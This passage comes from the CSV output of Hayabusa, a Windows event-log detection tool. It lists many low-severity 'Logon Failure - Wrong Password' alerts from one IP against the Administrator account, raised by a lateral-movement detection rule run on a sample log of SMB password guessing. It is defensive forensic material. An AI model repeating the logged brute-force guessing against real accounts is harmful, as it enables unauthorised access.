NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 